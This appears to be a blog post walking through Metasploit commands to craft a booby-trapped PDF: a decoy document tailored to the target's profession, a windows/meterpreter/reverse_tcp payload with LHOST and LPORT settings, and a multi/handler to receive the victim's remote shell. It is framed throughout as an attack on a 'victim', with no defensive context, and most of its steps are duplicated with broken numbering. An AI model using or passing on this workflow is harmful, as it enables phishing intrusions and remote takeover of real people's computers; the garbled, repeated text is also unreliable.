Lets
Begin :1) Prepare a .pdf file that you wish to embed within the
malicious file. This file will greet the target when he executes the
malicious file. So pick something related to the theme of his job, for
example if he is a doctor then send him some medical bullshit .pdf you
find on the net.
2) Load up msfconsole and type : search pdf embed
3) You know the drill, for more information on the exploit type : info exploit/windows/....../....../....../
4) Read through the description section
5) Type : use exploit/windows/fileformat/..../...../
6) Its time to pick a desirable payload for your scenario, type show payloads
7) I have chosen the common windows/meterpreter/reverse_tcp
8) Once you have made your payload choice, lets prepare with setting up the exploit.
a) set PAYLOAD (choice of payload)
b) set LHOST (your IP)
c) set LPORT 4444 (by default)
d) set FILENAME ( give your malicious .pdf a name)
e) set INFILENAME (provide the .PDF you prepared to embed, refer to point
9) And finally type, exploit.
10) As shown in the example below, the new malicious file has been created and is stored in my root/.msf4/local folder
11) So when the victim executes urgent.pdf, he will be greeted with the .pdf file we declared during our set INFILENAME options. But behind the scene, our payload gets executed.
12) There we go, satan is sitting right there.413) All that is left for us to do now is to set up our multi handler.
13) As shown in the image below.a) set PAYLOAD (Must must use the same payload as the one you used on your victim)b) set LHOST (Your ip)c) set PORT 4444 ( By Default)
2) Load up msfconsole and type : search pdf embed
3) You know the drill, for more information on the exploit type : info exploit/windows/....../....../....../
4) Read through the description section
5) Type : use exploit/windows/fileformat/..../...../
6) Its time to pick a desirable payload for your scenario, type show payloads
7) I have chosen the common windows/meterpreter/reverse_tcp
8) Once you have made your payload choice, lets prepare with setting up the exploit.
a) set PAYLOAD (choice of payload)
b) set LHOST (your IP)
c) set LPORT 4444 (by default)
d) set FILENAME ( give your malicious .pdf a name)
e) set INFILENAME (provide the .PDF you prepared to embed, refer to point
9) And finally type, exploit.
10) As shown in the example below, the new malicious file has been created and is stored in my root/.msf4/local folder
11) So when the victim executes urgent.pdf, he will be greeted with the .pdf file we declared during our set INFILENAME options. But behind the scene, our payload gets executed.
12) There we go, satan is sitting right there.413) All that is left for us to do now is to set up our multi handler.
13) As shown in the image below.a) set PAYLOAD (Must must use the same payload as the one you used on your victim)b) set LHOST (Your ip)c) set PORT 4444 ( By Default)
0 comments:
Post a Comment